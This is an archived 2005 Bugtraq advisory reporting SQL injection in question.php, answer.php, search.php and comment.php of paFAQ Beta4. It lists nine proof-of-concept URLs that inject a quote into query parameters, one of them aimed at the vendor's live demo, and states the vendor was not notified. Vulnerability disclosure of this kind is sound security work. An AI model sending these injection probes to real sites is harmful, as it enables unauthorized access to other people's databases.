lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050217092112.16513.qmail@www.securityfocus.com>
Date: 17 Feb 2005 09:21:12 -0000
From: PersianHacker Team <pi3ch@...oo.com>
To: bugtraq@...urityfocus.com
Subject: [PersianHacker.NET 200505-07] paFAQ Beta4 Sql Injection




[PersianHacker.NET 200505-07] paFAQ Beta4 Sql Injection
Date: 2005 February
Bug Number: 07

paFAQ
is a feature rich FAQ/Knowledge base system allowing webmasters to keep an organized database of Frequently Asked Questions. paFAQ also makes a great Knowledge Database for problems and solutions related to your scripts and programs. It runs using PHP and MySQL for speedy processing times.
More info @:
http://www.phparena.net/pafaq.php


Discussion:
--------------------
Sql Injection in 'question.php', 'answer.php', 'search.php', 'comment.php' that may allow a remote user to launch Sql injection attacks.
A form of attack on a database-driven Web site in which the attacker executes unauthorized SQL commands by taking advantage of insecure code on a system connected to the Internet, bypassing the firewall.

This vulnerability is reported to exist in paFAQ Beta4, other versions might
also be affected. 

Exploit:
--------------------
http://www.example.com/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='
http://www.example.com/index.php?act=Question&id=1&orderby=q_id&order=DESC&limit='
http://www.example.com/index.php?act=Question&id=1&orderby=q_id&order='&limit=10
http://www.example.com/index.php?act=Question&id=1&orderby='&order=DESC&limit=10
http://www.example.com/index.php?act=Answer&cid=1&id=1&offset='
http://www.example.com/index.php?act=Search&code=01&search_item='
http://www.example.com/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id='
http://www.example.com/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email=4
http://www.example.com/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4


Example:
--------------------
@ authors website!
http://demo.phparena.net/pafaq/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='
-

Solution:
--------------------
in the code validate values with PHP patterns then process it.


Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by Pi3cH (pi3ch persianhacker net)
http://www.PersianHacker.NET

Special Thanks: our security team users.


Help
--------------------
visit: http://www.PersianHacker.NET
or mail me @: pi3ch persianhacker net


Note
--------------------
Scripts authors were not be contacted for this bug.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ